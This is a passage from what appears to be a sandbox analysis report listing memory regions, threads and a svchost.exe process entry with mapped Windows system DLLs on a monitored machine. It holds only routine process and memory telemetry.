"\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2681 start_va = 0x490000 end_va = 0x490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2682 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2683 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2684 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2685 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Thread: id = 171 os_tid = 0x31c Thread: id = 172 os_tid = 0x810 Thread: id = 173 os_tid = 0x42c Thread: id = 174 os_tid = 0x6e8 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x73857000" os_pid = "0x37c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c3d5" [0xc000000f], "LOCAL" [0x7] Region: id = 2806 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2807 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2808 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2809 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2810 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2811 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2812 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2813 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2814 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2815 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2816 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2817 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2818 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2819 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2820 start_va = 0x480000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2821 start_va = 0x4a0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2822 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2823 start_va = 0x4d0000 end_va = 0x4d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2824 start_va = 0x4e0000 end_va = 0x543fff monitored = 0 entry_point = 0x4f5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2825 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2826 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2827 start_va = 0x580000 end_va = 0x586fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2828 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2829 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2830 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2831 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2832 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2833 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2834 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2835 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2836 start_va = 0xb20000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2837 start_va = 0xbe0000 end_va = 0xfdafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 2838 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2839 start_va = 0x1060000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 2840 start_va = 0x10f0000 end_va = 0x10f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 2841 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2842 start_va = 0x1300000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2843 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2844 start_va = 0x15c0000 end_va = 0x15c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 2845 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 2846 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2847 start_va = 0x1780000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 2848 start_va = 0x1800000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 2849 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 2850 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 2851 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 2852 start_va = 0x1a90000 end_va = 0x1b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 2853 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2854 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2855 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 2856 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2857 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2858 start_va = 0x2100000 end_va = 0x2436fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2859 start_va = 0x2440000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 2860 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2861 start_va = 0x2800000 end_va = 0x28dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2862 start_va = 0x2940000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 2863 start_va = 0x2a40000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 2864 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2865 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 2866 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2867 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2868 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2869 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2870 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2871 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2872 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2873 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 2874 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 2875 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 2876 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 2877 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 2878 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2879 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2880 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2881 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2882 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2883 start_va = 0x7ffb0eea0000 end_va = 0x7ffb0f057fff monitored = 0 entry_point = 0x7ffb0eea5550 region_type = mapped_file name = "wmalfxgfxdsp.dll" filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll") Region: id = 2884 start_va = 0x7ffb0f0d0000 end_va = 0x7ffb0f102fff monitored = 0 entry_point = 0x7ffb0f0dae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2885 start_va = 0x7ffb0ff00000 end_va = 0x7ffb0ff87fff monitored = 0 entry_point = 0x7ffb0ff14510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2886 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2887 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2888 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2889 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2890 start_va = 0x7ffb1c720000 end_va = 0x7ffb1c74afff monitored = 0 entry_point = 0x7ffb1c72c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 2891 start_va = 0x7ffb1c750000 end_va = 0x7ffb1c85cfff monitored = 0 entry_point = 0x7ffb1c77f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 2892 start_va = 0x7ffb1da60000 end_va = 0x7ffb1da6dfff monitored = 0 entry_point = 0x7ffb1da62e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 2893 start_va = 0x7ffb1db80000 end_va = 0x7ffb1dbb7fff monitored = 0 entry_point = 0x7ffb1db868f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 2894 start_va = 0x7ffb1dbc0000 end_va = 0x7ffb1dc58fff monitored = 0 entry_point = 0x7ffb1dbda090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 2895 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2896 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2897 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2898 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2899 start_va = 0x7ffb1dea0000 end_va = 0x7ffb1dee7fff monitored = 0 entry_point = 0x7ffb1deaa1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2900 start_va = 0x7ffb1def0000 end_va = 0x7ffb1df4cfff monitored = 0 entry_point = 0x7ffb1df02bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2901 start_va = 0x7ffb1e710000 end_va = 0x7ffb1e81afff monitored = 0 entry_point = 0x7ffb1e752610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2902 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2903 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2904 start_va = 0x7ffb20ec0000 end_va = 0x7ffb20f2ffff monitored = 0 entry_point = 0x7ffb20ee2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2905 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2906 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2907 start_va = 0x7ffb215b0000 end_va = 0x7ffb215f9fff monitored = 0 entry_point = 0x7ffb215bac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2908 start_va = 0x7ffb21960000 end_va = 0x7ffb21b10fff monitored = 0 entry_point = 0x7ffb219b3690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2909 start_va = 0x7ffb22410000 end_va = 0x7ffb22418fff monitored = 0 entry_point = 0x7ffb224119a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2910 start_va = 0x7ffb22420000 end_va = 0x7ffb2242afff monitored = 0 entry_point = 0x7ffb22421cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2911 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2912 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2913 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2914 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2915 start_va = 0x7ffb23ea0000 end_va = 0x7ffb23ed1fff monitored = 0 entry_point = 0x7ffb23eb2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2916 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2917 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2918 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2919 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2920 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2921 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2922 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2923 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2924 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2925 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2926 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2927 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2928 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2929 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2930 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2931 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2932 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2933 start_va = 0x7ffb25770000 end_va = 0x7ffb257f5fff monitored = 0 entry_point = 0x7ffb2577d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2934 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2935 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2936 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" 